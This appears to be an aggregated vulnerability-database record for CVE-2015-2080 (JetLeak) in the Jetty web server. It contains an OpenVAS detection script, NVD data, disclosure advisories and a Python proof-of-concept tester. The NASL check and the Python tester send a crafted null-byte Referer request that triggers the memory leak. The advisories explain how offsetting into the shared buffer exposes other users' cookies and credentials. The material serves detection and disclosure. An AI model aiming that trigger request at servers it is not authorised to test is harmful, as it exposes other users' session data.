Jetty Shared Buffers Information Leakage Vulnerability
2015-03-02T00:00:00
ID OPENVAS:1361412562310805051 Type openvas Reporter Copyright (C) 2015 Greenbone Networks GmbH Modified 2019-09-26T00:00:00
Description
This host is installed with Jetty webserver and is prone to information
leakage vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# Jetty Shared Buffers Information Leakage Vulnerability
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:eclipse:jetty";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.805051");
script_cve_id("CVE-2015-2080");
script_version("2019-09-26T06:54:12+0000");
script_bugtraq_id(72768);
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_tag(name:"last_modification", value:"2019-09-26 06:54:12 +0000 (Thu, 26 Sep 2019)");
script_tag(name:"creation_date", value:"2015-03-02 14:50:23 +0530 (Mon, 02 Mar 2015)");
script_name("Jetty Shared Buffers Information Leakage Vulnerability");
script_tag(name:"summary", value:"This host is installed with Jetty webserver and is prone to information
leakage vulnerability.");
script_tag(name:"vuldetect", value:"Send a special crafted HTTP POST request and check the response.");
script_tag(name:"insight", value:"The flaw is triggered when handling 400 errors in HTTP responses. This may
allow a remote attacker to gain access to potentially sensitive information in the memory.");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to obtain sensitive
information that may aid in further attacks.");
script_tag(name:"affected", value:"Jetty versions 9.2.3 to 9.2.8 and beta releases of 9.3.x.");
script_tag(name:"solution", value:"Upgrade to Jetty 9.2.9.v20150224 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"exploit");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2015/Mar/12");
script_xref(name:"URL", value:"http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html");
script_xref(name:"URL", value:"http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2015 Greenbone Networks GmbH");
script_family("Web Servers");
script_dependencies("gb_jetty_detect.nasl");
script_mandatory_keys("jetty/detected");
script_require_ports("Services/www", 8080);
exit(0);
}
include("host_details.inc");
include("http_func.inc");
if (!port = get_app_port(cpe: CPE))
exit(0);
if (!get_app_location(cpe: CPE, port: port))
exit(0);
host = http_host_name(port: port);
req = string("POST / HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"Referer: ", raw_string(0x00), "\r\n",
"Content-Length: 0\r\n\r\n");
res = http_send_recv(port:port, data:req);
if(res && res =~ "^HTTP/1\.[01] 400" && "Illegal character 0x0 in state=HEADER_VALUE" >< res) {
security_message(port:port);
exit(0);
}
exit(99);
{"id": "OPENVAS:1361412562310805051", "type": "openvas", "bulletinFamily": "scanner", "title": "Jetty Shared Buffers Information Leakage Vulnerability", "description": "This host is installed with Jetty webserver and is prone to information\n leakage vulnerability.", "published": "2015-03-02T00:00:00", "modified": "2019-09-26T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805051", "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "references": ["http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html", "http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html", "http://seclists.org/fulldisclosure/2015/Mar/12"], "cvelist": ["CVE-2015-2080"], "lastseen": "2019-09-27T13:18:09", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2080"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31838", "SECURITYVULNS:VULN:14342", "SECURITYVULNS:DOC:32004"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8381C100449907A0334DEEC7E23A5C2A", "EXPLOITPACK:FFA957BFC443828CD6A7FF5B6E85B3EA"]}, {"type": "zeroscience", "idList": ["ZSL-2020-5562", "ZSL-2016-5306"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310869526"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156414", "PACKETSTORM:135804", "PACKETSTORM:156387", "PACKETSTORM:130567"]}, {"type": "zdt", "idList": ["1337DAY-ID-25382", "1337DAY-ID-23343"]}, {"type": "github", "idList": ["GHSA-GHGJ-3XQR-6JFM"]}, {"type": "nessus", "idList": ["FEDORA_2015-2673.NASL", "JETTY_CVE-2015-2080.NASL"]}, {"type": "fedora", "idList": ["FEDORA:73DD962CD8C7"]}, {"type": "cisa", "idList": ["CISA:32998D667194BA67A58624AE4C787D0A"]}], "modified": "2019-09-27T13:18:09", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2019-09-27T13:18:09", "rev": 2}, "vulnersScore": 5.2}, "pluginID": "1361412562310805051", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jetty Shared Buffers Information Leakage Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:eclipse:jetty\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805051\");\n script_cve_id(\"CVE-2015-2080\");\n script_version(\"2019-09-26T06:54:12+0000\");\n script_bugtraq_id(72768);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-09-26 06:54:12 +0000 (Thu, 26 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-03-02 14:50:23 +0530 (Mon, 02 Mar 2015)\");\n\n script_name(\"Jetty Shared Buffers Information Leakage Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jetty webserver and is prone to information\n leakage vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP POST request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw is triggered when handling 400 errors in HTTP responses. This may\n allow a remote attacker to gain access to potentially sensitive information in the memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to obtain sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Jetty versions 9.2.3 to 9.2.8 and beta releases of 9.3.x.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jetty 9.2.9.v20150224 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2015/Mar/12\");\n script_xref(name:\"URL\", value:\"http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html\");\n script_xref(name:\"URL\", value:\"http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_jetty_detect.nasl\");\n script_mandatory_keys(\"jetty/detected\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!get_app_location(cpe: CPE, port: port))\n exit(0);\n\nhost = http_host_name(port: port);\n\nreq = string(\"POST / HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: \", raw_string(0x00), \"\\r\\n\",\n \"Content-Length: 0\\r\\n\\r\\n\");\nres = http_send_recv(port:port, data:req);\n\nif(res && res =~ \"^HTTP/1\\.[01] 400\" && \"Illegal character 0x0 in state=HEADER_VALUE\" >< res) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web Servers"}
{"cve": [{"lastseen": "2020-10-03T12:49:49", "description": "The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-07T14:59:00", "title": "CVE-2015-2080", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2080"], "modified": "2019-03-08T11:29:00", "cpe": ["cpe:/a:eclipse:jetty:9.2.8", "cpe:/a:eclipse:jetty:9.2.5", "cpe:/a:eclipse:jetty:9.2.3", "cpe:/a:eclipse:jetty:9.2.4", "cpe:/a:eclipse:jetty:9.2.7", "cpe:/a:eclipse:jetty:9.3.0", "cpe:/a:eclipse:jetty:9.2.6", "cpe:/o:fedoraproject:fedora:22"], "id": "CVE-2015-2080", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2080", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:eclipse:jetty:9.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.3.0:m0:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.3.0:m1:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.7:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080"], "description": "\r\n\r\nGDS LABS ALERT: CVE-2015-2080\r\nJetLeak Vulnerability Remote Leakage Of Shared Buffers In Jetty Web Server\r\n\r\nSYNOPSIS\r\n========\r\nGotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users.\r\n\r\nThe vulnerability was made public by the Jetty development team on the 24th of February 2015 and included proof-of-concept exploit code. As a result, GDS Labs recommends upgrading Jetty web server to a version patched against this vulnerability as soon as possible.\r\n\r\n\r\nIMPACT\r\n======\r\nUsing a vulnerable version of the Jetty web server can lead to the compromise of sensitive data including data passed within headers (e.g. cookies, authentication tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.) of requests and responses handled by the web server.\r\n\r\nThe root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks from a previous exchange depending on the attacker\u2019s payload offset.\r\n\r\n\r\nARE YOU VULNERABLE?\r\n===================\r\nThis vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases (including the beta releases of 9.3.x) are vulnerable.\r\n\r\nGDS have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. The script code can be downloaded from the GDS Github repository below:\r\n\r\n - https://github.com/GDSSecurity/Jetleak-Testing-Script\r\n\r\nIf running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty might be bundled within third party products. GDS recommends referring to the Jetty Powered website (http://eclipse.org/jetty/powered/) for a non-exhaustive list of products that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available.\r\n\r\nWe have encountered cases where development teams use Jetty as a light-weight replacement for app servers such as Tomcat for internal testing. Organizations should consider notifying their development teams about the vulnerability and require teams to upgrade any vulnerable versions of Jetty.\r\n\r\nThe latest release of the Jetty HTTP server is available for download at the following locations:\r\n\r\n - Maven - http://central.maven.org/\r\n - Jetty Downloads - http://download.eclipse.org/jetty\r\n\r\n\r\nREFERENCES\r\n==========\r\nA thorough technical analysis of the vulnerability is available on the GDS blog at:\r\n\r\nhttp://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\n\r\nJetty Vulnerability Announcement:\r\n\r\nhttp://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html\r\n\r\nJetty Vulnerability Advisory:\r\n\r\nhttps://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n\r\n\r\nDISCLOSURE TIMELINE\r\n===================\r\nFeb 19, 2015 - Vulnerability report sent to security@eclipse.org using SendSafely\r\n\r\nFeb 23, 2015 - Jetty team downloads the vulnerability report\r\n\r\nFeb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code\r\n\r\nFeb 25, 2015 - GDS publicly discloses vulnerability\r\n\r\n\r\nGDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS\u2019 blog post and vulnerability disclosure was published after it was discovered that Jetty had publicly disclosed the vulnerability.\r\n\r\n\r\nCREDITS\r\n=======\r\nStephen Komal from Gotham Digital Science for discovering the bug.\r\n\r\n\r\nAbout GDS Labs\r\n==============\r\n\r\nSecurity Research & Development is a core focus and competitive advantage for GDS. The GDS Labs team has the following primary directives:\r\n\r\n - Assessing cutting-edge technology stacks\r\n\r\n - Improving delivery efficiency through custom tool development\r\n\r\n - Finding & responsibly disclosing vulnerabilities in high value targets\r\n\r\n - Assessing the impact to our clients of high risk, publicly disclosed vulnerabilities\r\n\r\nThe GDS Labs R&D team performs security research, with areas of current focus including mobile application security, embedded systems, and cryptography. GDS also participates in many security related organizations and groups. GDS Labs is a value added service that our clients benefit from on virtually every engagement that we perform.\r\n\r\n\r\nAbout Gotham Digital Science\r\n=======================\r\n\r\nGotham Digital Science (GDS) is a specialist security consulting company focused on helping our clients find, fix, and prevent security bugs in mission critical network infrastructure, web-based software applications, mobile apps and embedded systems. GDS is also committed to contributing to the security and developer communities through sharing knowledge and resources such as blog posts, security tool releases, vulnerability disclosures, sponsoring and presenting at various industry conferences. \r\n\r\nFor more information on GDS, please contact info@gdssecurity.com or visit http://www.gdssecurity.com.\r\n\r\n", "edition": 1, "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:DOC:31838", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31838", "title": "GDS Labs Alert [CVE-2015-2080] - JetLeak Vulnerability: Remote Leakage Of Shared Buffers In Jetty Web Server", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080"], "description": "Memory buffers content leakage.", "edition": 1, "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:VULN:14342", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14342", "title": "Jetty information leakage", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080", "CVE-2014-3451"], "description": "\r\n\r\nIncorrect handling of self signed certificates in OpenFire XMPP Server\r\n\r\n\r\nAffected software: OpenFire XMPP server\r\nAffected versions: 3.9.3 and earlier\r\nVulnerabilities addressed: CVE-2014-3451, CVE-2015-2080\r\n\r\nOpenfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the widely adopted open protocol for instant messaging, XMPP (also called Jabber). \r\n\r\n\r\nVulnerability details\r\n\r\nThe OpenFire server would incorrectly accept self signed certificates potentially allowing spoofing attacks.\r\n\r\nThis issue (CVE-2014-3451) is fixed in release 3.10 (OF-405). \r\n\r\nWe would like to thank Kim Alvefur for reporting this issue.\r\n\r\n\r\nNotes on release\r\n\r\nThe 3.10 release of OpenFire also addresses a reflected XSS issue (OF-845), and upgrades the Jetty library used (addressing CVE-2015-2080).\r\n\r\n\r\nRelease announcement (includes link to download and SHA1 checksums)\r\n\r\nhttps://community.igniterealtime.org/blogs/ignite/2015/04/22/openfire-3100-released\r\n\r\n\r\n\r\nSimon Waters\r\nphone +448454681066\r\nemail simon.waters@surevine.com\r\nskype simon.waters.surevine\r\n\r\n\r\nParticipate | Collaborate | Innovate\r\n\r\nSurevine Limited, registered in England and Wales with number 06726289. Mailing Address : PO Box 1136, Guildford GU1 9ND\r\nIf you think you have received this message in error, please notify us.\r\n\r\n", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:32004", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32004", "title": "Incorrect handling of self signed certificates in OpenFire XMPP Server", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-01T17:32:50", "description": "Gotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users. Jetty versions 9.2.3 through 9.2.8 are affected. Proof of concept code included.", "edition": 2, "published": "2015-03-03T00:00:00", "type": "zdt", "title": "Jetty 9.2.8 Shared Buffer Leakage Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2015-03-03T00:00:00", "id": "1337DAY-ID-23343", "href": "https://0day.today/exploit/description/23343", "sourceData": "GDS LABS ALERT: CVE-2015-2080\r\nJetLeak Vulnerability Remote Leakage Of Shared Buffers In Jetty Web Server\r\n\r\nSYNOPSIS\r\n========\r\nGotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users.\r\n\r\nThe vulnerability was made public by the Jetty development team on the 24th of February 2015 and included proof-of-concept exploit code. As a result, GDS Labs recommends upgrading Jetty web server to a version patched against this vulnerability as soon as possible.\r\n\r\n\r\nIMPACT\r\n======\r\nUsing a vulnerable version of the Jetty web server can lead to the compromise of sensitive data including data passed within headers (e.g. cookies, authentication tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.) of requests and responses handled by the web server.\r\n\r\nThe root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks from a previous exchange depending on the attacker\u2019s payload offset.\r\n\r\n\r\nARE YOU VULNERABLE?\r\n===================\r\nThis vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases (including the beta releases of 9.3.x) are vulnerable.\r\n\r\nGDS have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. The script code can be downloaded from the GDS Github repository below:\r\n\r\n - https://github.com/GDSSecurity/Jetleak-Testing-Script\r\n\r\nIf running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty might be bundled within third party products. GDS recommends referring to the Jetty Powered website (http://eclipse.org/jetty/powered/) for a non-exhaustive list of products that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available.\r\n\r\nWe have encountered cases where development teams use Jetty as a light-weight replacement for app servers such as Tomcat for internal testing. Organizations should consider notifying their development teams about the vulnerability and require teams to upgrade any vulnerable versions of Jetty.\r\n\r\nThe latest release of the Jetty HTTP server is available for download at the following locations:\r\n\r\n - Maven - http://central.maven.org/\r\n - Jetty Downloads - http://download.eclipse.org/jetty\r\n\r\n\r\nREFERENCES\r\n==========\r\nA thorough technical analysis of the vulnerability is available on the GDS blog at:\r\n\r\nhttp://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\n\r\nJetty Vulnerability Announcement:\r\n\r\nhttp://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html\r\n\r\nJetty Vulnerability Advisory:\r\n\r\nhttps://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n\r\n\r\nDISCLOSURE TIMELINE\r\n===================\r\nFeb 19, 2015 - Vulnerability report sent to [email\u00a0protected] using SendSafely\r\n\r\nFeb 23, 2015 - Jetty team downloads the vulnerability report\r\n\r\nFeb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code\r\n\r\nFeb 25, 2015 - GDS publicly discloses vulnerability\r\n\r\n\r\nGDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS\u2019 blog post and vulnerability disclosure was published after it was discovered that Jetty had publicly disclosed the vulnerability.\r\n\r\n\r\nCREDITS\r\n=======\r\nStephen Komal from Gotham Digital Science for discovering the bug.\r\n\r\n\r\nAbout GDS Labs\r\n==============\r\n\r\nSecurity Research & Development is a core focus and competitive advantage for GDS. The GDS Labs team has the following primary directives:\r\n\r\n - Assessing cutting-edge technology stacks\r\n\r\n - Improving delivery efficiency through custom tool development\r\n\r\n - Finding & responsibly disclosing vulnerabilities in high value targets\r\n\r\n - Assessing the impact to our clients of high risk, publicly disclosed vulnerabilities\r\n\r\nThe GDS Labs R&D team performs security research, with areas of current focus including mobile application security, embedded systems, and cryptography. GDS also participates in many security related organizations and groups. GDS Labs is a value added service that our clients benefit from on virtually every engagement that we perform.\r\n\r\n\r\nAbout Gotham Digital Science\r\n=======================\r\n\r\nGotham Digital Science (GDS) is a specialist security consulting company focused on helping our clients find, fix, and prevent security bugs in mission critical network infrastructure, web-based software applications, mobile apps and embedded systems. GDS is also committed to contributing to the security and developer communities through sharing knowledge and resources such as blog posts, security tool releases, vulnerability disclosures, sponsoring and presenting at various industry conferences. \r\n\r\nFor more information on GDS, please contact [email\u00a0protected] or visit http://www.gdssecurity.com.\r\n\r\n\r\n-----------------------------------\r\njetleak_tester.py proof of concept:\r\n\r\nimport httplib, urllib, ssl, string, sys, getopt\r\nfrom urlparse import urlparse\r\n\r\n'''\r\n\r\nAuthor: Gotham Digital Science\r\n\r\nPurpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether \r\n their Jetty web server versions are vulnerable to JetLeak. Currently, this script does \r\n not handle sites with invalid SSL certs. This will be fixed in a future iteration.\r\n\r\n'''\r\n\r\nif len(sys.argv) < 3:\r\n print(\"Usage: jetleak.py [url] [port]\")\r\n sys.exit(1)\r\n\r\nurl = urlparse(sys.argv[1])\r\nif url.scheme == '' and url.netloc == '':\r\n print(\"Error: Invalid URL Entered.\")\r\n sys.exit(1)\r\n\r\nport = sys.argv[2]\r\n\r\nconn = None\r\n\r\nif url.scheme == \"https\":\r\n conn = httplib.HTTPSConnection(url.netloc + \":\" + port)\r\nelif url.scheme == \"http\":\r\n conn = httplib.HTTPConnection(url.netloc + \":\" + port)\r\nelse: \r\n print(\"Error: Only 'http' or 'https' URL Schemes Supported\")\r\n sys.exit(1)\r\n \r\nx = \"\\x00\"\r\nheaders = {\"Referer\": x}\r\nconn.request(\"POST\", \"/\", \"\", headers)\r\nr1 = conn.getresponse()\r\n\r\nif (r1.status == 400 and (\"Illegal character 0x0 in state\" in r1.reason)):\r\n print(\"\\r\\nThis version of Jetty is VULNERABLE to JetLeak!\")\r\nelse:\r\n print(\"\\r\\nThis version of Jetty is NOT vulnerable to JetLeak.\")\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23343"}, {"lastseen": "2018-03-31T01:23:35", "edition": 2, "description": "Exploit for multiple platform in category remote exploits", "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2016-02-17T00:00:00", "id": "1337DAY-ID-25382", "href": "https://0day.today/exploit/description/25382", "sourceData": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers\r\nVendor: Inductive Automation\r\nProduct web page: http://www.inductiveautomation.com\r\nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)\r\nPlatform: Java\r\n \r\nSummary: Ignition is a powerful industrial application platform with\r\nfully integrated development tools for building SCADA, MES, and IIoT\r\nsolutions.\r\n \r\nDesc: Remote unauthenticated atackers are able to read arbitrary data\r\nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server.\r\nWhen the Jetty web server receives a HTTP request, the below code is used\r\nto parse through the HTTP headers and their associated values. The server\r\nbegins by looping through each character for a given header value and checks\r\nthe following:\r\n \r\n- On Line 1164, the server checks if the character is printable ASCII or\r\nnot a valid ASCII character.\r\n- On Line 1172, the server checks if the character is a space or tab.\r\n- On Line 1175, the server checks if the character is a line feed.\r\n- If the character is non-printable ASCII (or less than 0x20), then all\r\nof the checks above are skipped over and the code throws an \u00ebIllegalCharacter\u00ed\r\nexception on line 1186, passing in the illegal character and a shared buffer.\r\n \r\n \r\n---------------------------------------------------------------------------\r\nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java\r\n---------------------------------------------------------------------------\r\n920: protected boolean parseHeaders(ByteBuffer buffer)\r\n921: {\r\n[..snip..]\r\n1163: case HEADER_VALUE:\r\n1164: if (ch>HttpTokens.SPACE || ch<0)\r\n1165: {\r\n1166: _string.append((char)(0xff&ch));\r\n1167: _length=_string.length();\r\n1168: setState(State.HEADER_IN_VALUE);\r\n1169: break;\r\n1170: }\r\n1171:\r\n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)\r\n1173: break;\r\n1174:\r\n1175: if (ch==HttpTokens.LINE_FEED)\r\n1176: {\r\n1177: if (_length > 0)\r\n1178: {\r\n1179: _value=null;\r\n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString());\r\n1181: }\r\n1182: setState(State.HEADER);\r\n1183: break;\r\n1184: }\r\n1185:\r\n1186: throw new IllegalCharacter(ch,buffer);\r\n---------------------------------------------------------------------------\r\n \r\n \r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n Ubuntu Linux 14.04\r\n Mac OS X\r\n HP-UX Itanium\r\n Jetty(9.2.z-SNAPSHOT)\r\n Java/1.8.0_73\r\n Java/1.8.0_66\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5306\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php\r\n \r\nCVE: CVE-2015-2080\r\nCVE URL: 